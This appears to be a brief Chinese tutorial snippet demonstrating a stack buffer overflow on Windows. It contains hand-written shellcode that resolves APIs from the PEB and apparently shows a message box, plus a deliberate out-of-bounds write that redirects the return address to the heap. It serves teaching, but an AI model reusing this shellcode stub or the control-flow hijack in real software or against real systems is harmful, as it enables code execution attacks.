簡單緩衝區溢出示例

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

unsigned char shellcode[] =
"\xEB\x42\x8B\x59\x3C\x8B\x5C\x0B\x78\x03\xD9\x8B\x73\x20\x03\xF1"
"\x33\xFF\x4F\x47\xAD\x33\xED\x0F\xB6\x14\x01\x38\xF2\x74\x08\xC1"
"\xCD\x03\x03\xEA\x40\xEB\xF0\x3B\x6C\x24\x04\x75\xE6\x8B\x73\x24"
"\x03\xF1\x66\x8B\x3C\x7E\x8B\x73\x1C\x03\xF1\x8B\x04\xBE\x03\xC1"
"\x5B\x5F\x53\xC3\xEB\x4F\x33\xC0\x64\x33\x40\x30\x8B\x40\x0C\x8B"
"\x70\x1C\xAD\x8B\x48\x08\x58\x33\xDB\x33\xFF\x66\xBF\x33\x32\x57"
"\x68\x75\x73\x65\x72\x8B\xFC\x53\x51\x53\x50\x50\x53\x57\x68\x54"
"\x12\x81\x20\xE8\x8A\xFF\xFF\xFF\xFF\xD0\x8B\xC8\x68\x25\x59\x3A"
"\xE4\xE8\x7C\xFF\xFF\xFF\xFF\xD0\x59\x68\x97\x19\x6C\x2D\xE8\x6F"
"\xFF\xFF\xFF\xFF\xD0\xE8\xAC\xFF\xFF\xFF"
"緩衝區溢出成功！";

char *p = (char *)malloc(sizeof(char)*sizeof(shellcode));

int main(void)
{
	memcpy(p, shellcode, sizeof(shellcode));
	int buffer[1];
	buffer[2] = (int)p;
	return 0;
}

運行後效果圖：